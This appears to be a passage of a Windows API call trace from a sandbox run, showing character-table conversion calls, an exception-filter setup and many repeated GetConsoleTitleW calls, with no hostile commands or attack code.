cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.157] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0124.157] GetLastError () returned 0x0 [0124.157] SetLastError (dwErrCode=0x0) [0124.157] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0124.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆ꗅ@Ā") returned 256 [0124.157] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆ꗅ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0124.157] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆ꗅ@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿO\x98ýQ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0124.157] GetLastError () returned 0x0 [0124.157] SetLastError (dwErrCode=0x0) [0124.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆ꗅ@Ā") returned 256 [0124.157] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆ꗅ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0124.158] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䈴䐆ꗅ@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0124.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿO\x98ýQ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0124.158] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4047dd) returned 0x0 [0124.160] RtlSizeHeap (HeapHandle=0x5580000, Flags=0x0, MemoryPointer=0x5581a00) returned 0x80 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.161] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.162] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.163] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] GetConsoleTitleW (in: lpConsoleTitle=0x0, nSize=0x0 | out: lpConsoleTitle=0x0) returned 0x0 [0124.164] 